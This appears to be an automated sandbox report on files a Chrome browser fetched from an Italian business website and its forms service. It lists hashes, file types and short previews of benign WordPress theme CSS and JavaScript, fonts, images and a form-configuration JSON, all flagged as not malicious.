                                                                                                                                              MD5:5637234570B03B86FE3C641F3C3E09AA
                                                                                                                                              SHA1:A8719B6F0BC2F49802B105E8DCFAC82F57C18B99
                                                                                                                                              SHA-256:26AB2D6C2706A14EFE35814604C70499DC4DEC59F3F548D7A57A4E0829E2F15E
                                                                                                                                              SHA-512:9D500CB25A9C6AE7D32CDE093B43DE0A2F3898C6CCEB59D5FA2005ECBCB3B8BF485D4F9980D9AD4F6C8D9D9C7D5B8286FC6BB84D35F87AFCFE24478D41E05DB1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image/image.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Image.====================================================================================================================================================== */..avia-image-container{display:block; position: relative; max-width: 100%;}..avia-image-container-inner, .avia_image, .av-image-caption-overlay{border-radius: 3px; display:block; position: relative; max-width: 100%;}..avia-image-container.avia-align-center{display:block; margin: 0 auto 10px auto; text-align: center; clear: both;}..avia-image-container.avia-align-center .avia-image-container-inner{margin:0 auto; display:inline-block; vertical-align:bottom}..avia-image-container.avia-align-left{display:block; float:left; margin-right: 15px; margin-top: 5px;}..avia-image-container.avia-align-right{display:block; float:right; margin-left: 15px; margin-top: 5px;}..avia-image-contai
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2974
                                                                                                                                              Entropy (8bit):4.954218561225648
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:eUT6SIp7kVrXKkVrOAkVrdpT1tGoLa0u5azvF6jiJTVfXII0mIUwQk6D820W8DC5:nkpkL/aJNg0u5arFTZA0rDgWmo
                                                                                                                                              MD5:024313E08099EEB557F7C03CE4B3EE82
                                                                                                                                              SHA1:DE3653E75740ECED4EF4D8D7BDB8613A2C1038FF
                                                                                                                                              SHA-256:0F074F370473A437A345467CD13A2E090520221E3340B1253959FEFB587B89C5
                                                                                                                                              SHA-512:B5BC1D4C1484F927ABA0B08919E602E14462014CB90AFF43AF8D895172F4DB712B3EB0C3429735EE2B123CF1B314A9AF117EEE9FF2EBCCC58020ED4607DAEBAF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Big Number animation shortcode javascript.// -------------------------------------------------------------------------------------------..(function($).{..// options.simple_up = dont prepend leading zeros, options.instant_start = trigger counting instantly, options.start_timer = delay when to start counting..$.fn.avia_sc_animated_number = function(options) ..{...if(!this.length) return;...if(this.is('.avia_sc_animated_number_active')) return;......this.addClass('avia_sc_animated_number_active');.....var skipStep = false,....simple_upcount .= (options && options.simple_up) ? true : false,....start_timer .= (options && options.start_timer) ? options.start_timer : 300,...start_count = function(element, countTo, increment, current, fakeCountTo)...{............//calculate the new number....var newCount = current + increment;........//if the number is bigger than our final number set the number a
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):706
                                                                                                                                              Entropy (8bit):5.683510979851918
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:YET/HnhTjQ+LpqpGeKaA8EwBQfvYKiZz66DGiNonavYKTNu9cp/oadk2QBld4:YErB3QKYpjZ/EwBH5ZDDGJaQaNu9cp/t
                                                                                                                                              MD5:56B356057CFC679F620E3C154120DE2C
                                                                                                                                              SHA1:B825A2F27A647B12ABFD68FBB81E6B1D42C1E256
                                                                                                                                              SHA-256:01A49B3A0028AC87F225F82D71DE9422AF3E519A42AB2F04F35B471B40D5B4C6
                                                                                                                                              SHA-512:5E1A879C2C3C1E17555B1340E891D47DD647209BE027B5446A9AA9E9CE945F59E3DF6EBA54BFEDE61B06BCBD22D0CA3C2113034D631D103B7EC2277D52A1CC0B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"data":"[{\"ragiona_sociale\":\"CIPASSO Roma\",\"nome_schema_db\":\"user_253\",\"cod_univoco\":\"47667869\",\"cod_cliente\":252,\"numero_versione_informativa\":\"1\",\"result\":\"OK\",\"remarketing\":true,\"paypal\":\"AarcVjPXz7SzNcLKnN1nBimL_9gU_ikqivx78L2wiTM5Is7h7PRtCt9QXdZzbXFLFD79HNDhjZFSYOYM\",\"stripe\":null,\"satispay\":{\"token\":\"\"},\"hashform\":\"uzuypfb7d33r7lvcjvw37oharuqxwlgk\",\"link_informativa\":\"https://privacy-pienissimo.s3.eu-central-1.amazonaws.com/informativa/uzuypfb7d33r7lvcjvw37oharuqxwlgk/index.html?page=1\",\"token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjaGVjayI6dHJ1ZSwiaWF0IjoxNzM1OTE5MTkxLCJleHAiOjE3MzU5MjA5OTF9.7ceUSoELsrL7n3AilHr9tI7rGluvk64qCVNKUYcgjUA\"}]"}
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6521
                                                                                                                                              Entropy (8bit):3.608873022770343
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:sV6/l9KLvPvHgARGZv8xis1UdladZ2/SDK4soea32pB5xmiY:smbMvPvHgARGZv81fdo/SD74a32KiY
                                                                                                                                              MD5:23EAD2A4210E41EDEC1EB832658C70D5
                                                                                                                                              SHA1:3BDF7DFA0DB381DF05121A685EB7886A4485E176
                                                                                                                                              SHA-256:4608E5697A24255F61DF701FBC0868A521F660C95049986B99FEEB7C212CCD8E
                                                                                                                                              SHA-512:EC741E4F4FCC47E4DCA631A6233DAABEB7BA64781CEE596427B4BC0AE6DD8C862F228F9F2F1592B5589713A80BCFA3B0ECD9DE981C40E970ECA561850DAEC125
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Avia Timeline.// -------------------------------------------------------------------------------------------...(function($) {. "use strict";.. $(window).on('load', function (e) {. if ($.AviaSlider) {. $('.avia-timeline-container').avia_sc_timeline();. }. });... $.fn.avia_sc_timeline = function (options) {.. return this.each(function () {.. var container = this,. timeline_id = '#' + $(this).attr('id'),. timeline = $(timeline_id),. methods;.. methods =. {. // make sure all milestones have the same height in horizontal timelines. matchHeights: function(){.. //date.......this.setMinHeight( $(timeline_id + ' .av-milestone-placement-top .av-milestone-date'), true );........//content.......this.setMinHeight( $(ti
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 44584, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):44584
                                                                                                                                              Entropy (8bit):7.989114524329455
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:Fk3EENWe3OFWghUYjRfwX9434VKKRJKXuszWdndKD3NQfw/akZ9jz4Pp+8b+GW6:ece3ihZjRoE4VjrIasD9Qfw/aKz4h+Uf
                                                                                                                                              MD5:E04669366CDA1ACA21161F9E22BAC3AE
                                                                                                                                              SHA1:157532EC5CDB07C395EB96AA6E9D0DE1EEB869A7
                                                                                                                                              SHA-256:43A079FD739DFFA727DE659B5BBF44596031AA7542C8A8AFBC54A243AAB96B47
                                                                                                                                              SHA-512:6422CF1A0098E936F3F58E44338951CC255F72D3DA13848850A3F84ACE884947F622A03FDAAD5E0C3C14943C9564AF654FAA326624B30B14748736E09342005D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://fonts.gstatic.com/s/fjallaone/v15/Yq6R-LCAWCX3-6Ky7FAFrOF6kg.woff2
                                                                                                                                              Preview:wOF2.......(.......H..................................z..@.`....z........p.....0..6.$..\. ..T..I..K[..qB..t.n2.".t..R...n.4.T.W......a..V...'&.!3.>-+..z..r...u.Dn......+3....r....n....?..z.....o..!.O6.5..b..;.Z..Z.E.'.t4*1.3A,..Y._/...8i...}D}..oW.[|!.......[..(..n...<>.0..N..q^...k..=s.5..jc.:o.......u..w{.....8.BC...b.oQ\..'.a.~..{../.c.A.h1....?.....1\..]&}.Tz..^7..].....b.(#.. .2.A......Z.@m...m.@...x..M.W..".V@-...~...:.s.Qc.=.j..U...6b....=.$R.U.D.a...H.xa.....F.(E.....'eB%.2L..(...0.f...........!.....P*T.xn.._...?....6.........}..o.n..p...u.M.+.:1.R..."..C..B.D.8]....8..?.=q.}_y.+..k.D..)3l....*.I..m.H=..9....9..qR.9"....>,....V....mjY.A........KvN&......I...u...#..O..t.....(.....@...NO.6...A..~G*...=..}.z..2.......a....og.$..(.....h.k......c.tL0...!...hj.j(..C... ...P.......^.D....C.YDK)V.oe...U..W...h.B2$...R..Q...O>L.u."os..S.........t..H...f..,.V.s..x.%.}.+..fq.A(..-..o..;.I.!G....+....U!.........'.X2/.C(.}..G.XL...V......K.P..x.m~`.o.....5
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):439667
                                                                                                                                              Entropy (8bit):5.243595990242837
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:U0O7cyX0P0ZrBBRiQPRnY+dRNU0o1t1GuYLRr:r0cyXbrXRW+dRNUzpYVr
                                                                                                                                              MD5:8D93196E124D21F268E252119288FBA5
                                                                                                                                              SHA1:24A9D79716B330D2B1F857CA6E6C43CDD9C90339
                                                                                                                                              SHA-256:D26E4EF6147116AD1DCF31B775663F0061C4D8D90C5F521300645B3A3AFC17B5
                                                                                                                                              SHA-512:EBDBE398EE904F83C760184DF65CB3DAA1CA55634AD4C8CE4D9C1267B7B8AAE3B19098A7E06AA2A2D6152BECD0B9AFF7195B20ED80AC3BCA2258D66F746B5E1E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/scripts.b5b418b830aaccc72e6a.js
                                                                                                                                              Preview:function callAppClientiHook(){console.log("callback start");try{OrderPaymentComplete.postMessage("Complete")}catch{console.log("callback lanciato per flutter")}}!function(t,e){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=t.document?e(t,!0):function(t){if(!t.document)throw new Error("jQuery requires a window with a document");return e(t)}:e(t)}("undefined"!=typeof window?window:this,(function(t,e){"use strict";var i=[],n=t.document,o=Object.getPrototypeOf,r=i.slice,s=i.concat,a=i.push,l=i.indexOf,u={},c=u.toString,h=u.hasOwnProperty,d=h.toString,p=d.call(Object),f={},m=function(t){return"function"==typeof t&&"number"!=typeof t.nodeType},g=function(t){return null!=t&&t===t.window},v={type:!0,src:!0,nonce:!0,noModule:!0};function _(t,e,i){var o,r,s=(i=i||n).createElement("script");if(s.text=t,e)for(o in v)(r=e[o]||e.getAttribute&&e.getAttribute(o))&&s.setAttribute(o,r);i.head.appendChild(s).parentNode.removeChild(s)}function y(t){return null==t?t+""
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):8363
                                                                                                                                              Entropy (8bit):4.546410233017379
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:FpbeuCTjyafyW0RB3kZ4Kyudxk2KDGWmSxMnHB+O/se:Fp6VXqWeB+4nqxk2KDOh
                                                                                                                                              MD5:A36B3D87508AD8F6A6BC6787BBE808ED
                                                                                                                                              SHA1:70F3E265EC75B35C1B1911171EB38A519974D2E4
                                                                                                                                              SHA-256:A24D5BB8F031434DCBB692FA6D62C2AAD3974D6E87ACAE884244D182D5B384C8
                                                                                                                                              SHA-512:62A23D4FAFFCAE8469C68C6A5B4608BA9D24603C0FAE96A591BDB09AEA23CF179D909296C0FB4F84B358E688249C4DAE5FD0F257D633066B94A8E4A45E98D0DE
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/pt.96475126e7232ee3558e.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="flag-icons-pt" viewBox="0 0 640 480">. <path fill="red" d="M256 0h384v480H256z"/>. <path fill="#060" d="M0 0h256v480H0z"/>. <g fill="#ff0" fill-rule="evenodd" stroke="#000" stroke-linecap="round" stroke-linejoin="round" stroke-width=".6">. <path d="M339.5 306.2c-32.3-1-180-93.2-181-108l8.1-13.5c14.7 21.3 165.7 111 180.6 107.8l-7.7 13.7"/>. <path d="M164.9 182.8c-2.9 7.8 38.6 33.4 88.4 63.8 49.9 30.3 92.9 49 96 46.4l1.5-2.8c-.6 1-2 1.3-4.3.6-13.5-3.9-48.6-20-92.1-46.4-43.6-26.4-81.4-50.7-87.3-61a6.3 6.3 0 0 1-.6-3.1h-.2l-1.2 2.2-.2.3zm175.3 123.8c-.5 1-1.6 1-3.5.8-12-1.3-48.6-19.1-91.9-45-50.4-30.2-92-57.6-87.4-64.8l1.2-2.2.2.1c-4 12.2 82.1 61.4 87.2 64.6 49.8 30.8 91.8 48.9 95.5 44.2l-1.3 2.3z"/>. <path d="M256.2 207.2c32.2-.3 72-4.4 95-13.6l-5-8c-13.5 7.5-53.5 12.5-90.3 13.2-43.4-.4-74.1-4.5-89.5-14.8l-4.6 8.6c28.2 12 57.2 14.5 94.4 14.6"/>. <path d="M352.5 193.8c-.8 1.3-15.8 6.4-37.8
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (2410)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):175897
                                                                                                                                              Entropy (8bit):5.549876394125764
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                              MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                              SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                              SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                              SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                              Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):784
                                                                                                                                              Entropy (8bit):4.440391379109024
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:jn4IfO8hRGcNmZH8Hql298TggCCgEcMTXeWmos5/ZzWgMb:bThj62CTzTXeWmos5xzWgMb
                                                                                                                                              MD5:08B7F19D89B532948C890F1107A76C9C
                                                                                                                                              SHA1:CEDB1D9D8444B39C24FAA7E9EF502FF0ACD2F925
                                                                                                                                              SHA-256:5CF52E501833EB1D14D3C61DE8243E9639ABDAF65555F7F5281CF7DD09336F23
                                                                                                                                              SHA-512:6F24C703A4DE00FBECE42E6E7E2C539DC3B9AEE5BE7BC4F745110E4BB99DDCBB1C06B2D2B6584E277FC130DC1A02289A7D9C16D8B27A3BC607543DD07830F60F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// AVIA Image Hotspots.// -------------------------------------------------------------------------------------------..(function($).{ .."use strict";...$.fn.aviaHotspots = function( options )..{...if(!this.length) return; ....return this.each(function()...{....var _self = {};........_self.container.= $(this);...._self.hotspots.= _self.container.find('.av-image-hotspot');........._self.container.on('avia_start_animation', function().....{......setTimeout(function()......{......._self.hotspots.each(function(i).......{........var current = $(this);........setTimeout(function(){ current.addClass('av-display-hotspot'); },300 * i);.......});......},400);.....});....});..};...}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):18536
                                                                                                                                              Entropy (8bit):7.986571198050597
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:IhocXmE6eM871P7td/mcOKA454H2orQEONKrOqxw:f6WeL1P//9D54WCCKc
                                                                                                                                              MD5:8EFF0B8045FD1959E117F85654AE7770
                                                                                                                                              SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                                                                                                              SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                                                                                                              SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                              Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3712
                                                                                                                                              Entropy (8bit):4.938508521934181
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:2urbAu/xypO+yfFrMUzaA/L69K6BQReUqQ7qZwV9WV9CqZTx3:ZAu/GkMUWPPjsuwbWbCuTx3
                                                                                                                                              MD5:04A5FEE40220CA682687A1D493FBCF54
                                                                                                                                              SHA1:51F935209D60DE6A74D7BE90BD26D0C7450232CA
                                                                                                                                              SHA-256:B3A5239413B3162BC28614E17F985AAD6B8C5E929D338FB15FD50CDD9067FEB6
                                                                                                                                              SHA-512:5E0452F34306C5395DBE48398631A7D03A60A984D6D9F1FB3ADCC57C5835E52223361977A72756B181623E2CBED3DD3CD966A7286BB5730B1CF513EA5E09B7FC
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.ICONLIST.====================================================================================================================================================== */..avia-icon-list-container{margin:30px 0; clear: both;}..avia-icon-list{margin:0; padding:0;}..avia-icon-list li{margin:0; padding:0 0 30px 0; list-style-type: none; list-style-position: outside; clear:both; position: relative; min-height:60px;}..avia-icon-list .iconlist_icon{height:64px; width:64px; line-height: 64px; font-size: 30px; text-align: center; border-radius: 500px; position: relative; float:left; margin-right:30px; margin-left:2px; z-index: 5; color:#fff;}..avia-icon-list a.iconlist_icon:hover{color:#fff; text-decoration: none;}..avia-icon-list .iconlist_title{text-transform: uppercase; top: 4px; margin-bottom:0; position: relative;}.#top .avia-icon-list .iconlis
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 333 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):25096
                                                                                                                                              Entropy (8bit):4.968019197309454
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:QJN9NvOKt05UD7aqNGnVlZg/3Xnf7TeHMJe:0N9NvJtB+DZg78MJe
                                                                                                                                              MD5:D80AC861EC95C47E067F19CF62DF6566
                                                                                                                                              SHA1:251E3EDC59011BD7D7B45059431C19E4EE9F31DE
                                                                                                                                              SHA-256:C510646040C6062D1369F5E7FAF1D2F9984036AC3EC49C204C6C4E0B79ED2FBF
                                                                                                                                              SHA-512:F406B238838565E9BCDD3B037D1153DFC96A0BD0DEADBC1B1B25AEF72D34777165EB24F710292DF046B905F83F9913A56E2538919E6F38684FDA442E33AD9A8F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2019/05/Cipasso_simbolo3.png
                                                                                                                                              Preview:.PNG........IHDR...M...2.......d....pHYs.................iCCPPhotoshop ICC profile..x..wT.Y.......-!.RBo....k...FH ...B.......X...eDFD... cA,X..{..AE]..6T....{v..=g.s.9..{........Nr.R1...-..b...I.)l.. .......\.ott8...p.....6\.T..[...sy.H4...sy...1...'....$.0^*......`..S..-...Lr=.0.&............D.re...].`...r..'....E.....x.\>.M........h..`..O>...LSzr..%O......Q.T.].....+..0...P....$..&kI..%i.QS,.O......!.S...O.b>7 l..Y.S.M...9qS,[.....#....%....Nq.(.3....)..%DNqnVl......S.({..)g.....K...Q.....G...#..)}......J=7/VyV..S....i.h.."..<y.29.....r.H ..}.Rq:.#...b;...$%..'......@XW...N....D0.q..N<.`|.........)dy.......P.&h.>.....8...@ .B..A2,...!.d...`..C)l..P......!8.mp...E..}p......K...0. ...#.D.1@L.k..qE..@$..A..TD.H..R..CJ.2...4"."'...e....."#.[....4...f.l...E..8t!*@s.|...V.u.A..=.^Eo...Kt.....0C..s...(,...d.*.....f....n`..+.3..c..8.........rp.p.qU...V.y... n...O.....x.>././...+..............E0'..B..L...F..B....O."...Dm.5..E....b.N.A...u.0...J2 9..H)$.i-..t.t.t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3132
                                                                                                                                              Entropy (8bit):4.906445465361412
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:dim36puxKtaUk3F3fIe+N+bkSJ17JZQDo:diPYsQIOkq3Zx
                                                                                                                                              MD5:2677912FE3E873BD6795B03A1805CA07
                                                                                                                                              SHA1:49134743EB291B9A37795CC84D18F98AD0539390
                                                                                                                                              SHA-256:5C892F4E17CC9767DE2CBE574C4B00AD6951BB5DE908446EDEDEBC87EF43D6BD
                                                                                                                                              SHA-512:421EF6186A6A9CE81E3F68CF840578646BB3A8924662A6E6A1A8761461FFF78CC5BBED1B61387100402C5A486769C762621A58B69D604FE8195DC4BBA9E4879B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconbox/iconbox.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.ICONBOX.====================================================================================================================================================== */.#top .iconbox{background: transparent;}...iconbox{.margin-bottom:30px;.position: relative;.clear:both;.}...iconbox_icon {.float: left;.margin: 2px 10px 0 0;.height: 23px;.width: 23px;.font-size: 23px;.line-height: 18px;.-webkit-transition: all 0.3s ease-in-out;.transition: ..all 0.3s ease-in-out;.}..a.iconbox_icon:hover{.text-decoration: none;.}...iconbox_left .iconbox_icon {.border-radius: 50px;.text-align: center;.position: relative;.top: -7px;.left: -5px;.height: 30px;.width: 30px;.line-height: 30px;.margin: 2px 0px 0 0;.}...iconbox .iconbox_content .iconbox_content_title {.border: medium none;.padding: 2px 0 0 0;.position: relative;.margin:0 0 16px 0;.clear:none;.letter-s
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3676
                                                                                                                                              Entropy (8bit):4.893827432984945
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:YO3Uejknqcd98d+DYiXKpc7mcG4bRkDf53:YqjknbjmH
                                                                                                                                              MD5:777A2713EE53862260BEE5CB0C33089C
                                                                                                                                              SHA1:C98C8B63E40D551F5A2F5658807660C305E66CFE
                                                                                                                                              SHA-256:5F38C27B1CAA42E09FD9429E5E669A7923BF86DEF89E6326AACE23F0AF10D913
                                                                                                                                              SHA-512:20DC563250091E4CFA6BA7A0962076ABD18C84DE988343E9E6D48D45E558DE2AA24A42A7793BAC13FCA84696F11C6024C34B91B348673C493BD048E51152D478
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Tab Shortcode.// -------------------------------------------------------------------------------------------..(function($).{ .."use strict";...$.fn.avia_sc_tabs= function(options)..{...var defaults =...{....heading: '.tab',....content:'.tab_content',....active:'active_tab',....sidebar: false...};.....var win = $(window),....options = $.extend(defaults, options);.....return this.each(function()...{....var container .= $(this),.....tab_titles .= $('<div class="tab_titles"></div>').prependTo(container),.....tabs ..= $(options.heading, container),.....content .= $(options.content, container),.....newtabs .= false,.....oldtabs .= false;......newtabs = tabs.clone();....oldtabs = tabs.addClass('fullsize-tab').attr('aria-hidden', true );....tabs = newtabs;......tabs.prependTo(tab_titles).each(function(i)....{.....var tab = $(this), the_oldtab = false;.......if(newtabs) the_oldtab = oldtabs.filter(
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):14691
                                                                                                                                              Entropy (8bit):4.8063400415127555
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:u3QQ2yItETTVMnl2usTe1tS+3xGcDjNRcB/6jawdyv7B2eYvPj4cV8lryv/n4Po2:lyItETTCuSk6I
                                                                                                                                              MD5:F62ACE0989D6951EAA9E7E4386188B54
                                                                                                                                              SHA1:CE2111A3FFACEA0F536CC6FEB42C473C61DA7B64
                                                                                                                                              SHA-256:D6AB97A1E882663F0523529D464422B02293F6446D205AAA90B10EB8DFD2BF5E
                                                                                                                                              SHA-512:816072D0C9FBD8FBD43D04921751B94A40DF1878C9A222A772B6A80281C82D6B9C0DEE5D7724420CC4E73E04E56B444971A7A36EE3BE059FC46F237F58986E5C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.css?ver=6.0.9
